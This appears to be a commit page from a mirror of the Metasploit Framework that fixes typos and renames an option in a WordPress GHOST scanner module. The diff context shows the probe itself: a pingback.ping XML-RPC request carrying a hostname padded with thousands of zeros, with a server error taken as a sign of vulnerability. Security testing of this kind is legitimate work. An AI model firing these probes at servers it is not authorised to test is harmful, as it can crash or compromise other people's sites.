infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

code style and typos

bug/bundler_fix
Christian Mehlmauer 2015-01-30 15:57:32 +01:00
parent 9ce2dd9815
commit 7504358db3
No known key found for this signature in database
GPG Key ID: BCFF4FA966BC32C7
2 changed files with 12 additions and 12 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
lib/msf/http/wordpress/xmlrpc.rb
View File

@ -2,7 +2,7 @@
module Msf::HTTP::Wordpress::XmlRpc
# Determines if the XMLRPC interface is enabled by sending a demo.sayHello reuqest
# Determines if the XMLRPC interface is enabled by sending a demo.sayHello request
#
# @return [Boolean] true if the interface is enabled
def wordpress_xmlrpc_enabled?
@ -19,7 +19,7 @@ module Msf::HTTP::Wordpress::XmlRpc
return false
end
# Extracts the Wordpress version information from various sources
# Generates the xml post body for a XMLRPC call
#
# @param method_name [String] The XMLRPC method to call
# @param params [String] The XMLRPC method params

20
modules/auxiliary/scanner/http/wordpress_ghost_scanner.rb
View File

@ -39,12 +39,12 @@ class Metasploit3 < Msf::Auxiliary
register_options(
[
OptInt.new('COUNT', [false, 'Number of iterations', 2500]),
OptInt.new('LENGTH', [false, 'Payload length', 2500]),
], self.class)
end
def count
datastore['COUNT']
def length
datastore['LENGTH']
end
def generate_pingback_xml(target, valid_blog_post)
@ -62,7 +62,7 @@ class Metasploit3 < Msf::Auxiliary
return
end
ghost = "0" * count
ghost = "0" * length
payload = "http://#{ghost}/#{Rex::Text.rand_text_alpha(7)}.php"
xml = wordpress_generate_xml_rpc_body('pingback.ping', payload, payload)
@ -76,12 +76,12 @@ class Metasploit3 < Msf::Auxiliary
if res.nil? || res.code == 500
print_good("#{peer} - vulnerable to GHOST")
report_vuln(
:host => ip,
:proto => 'tcp',
:port => datastore['RPORT'],
:name => self.name,
:info => "Module #{self.fullname} found GHOST vulnerability",
:sname => datastore['SSL'] ? "https" : "http"
:host => ip,
:proto => 'tcp',
:port => datastore['RPORT'],
:name => self.name,
:info => "Module #{self.fullname} found GHOST vulnerability",
:sname => datastore['SSL'] ? "https" : "http"
)
else
print_status("#{peer} - target not vulnerable to GHOST")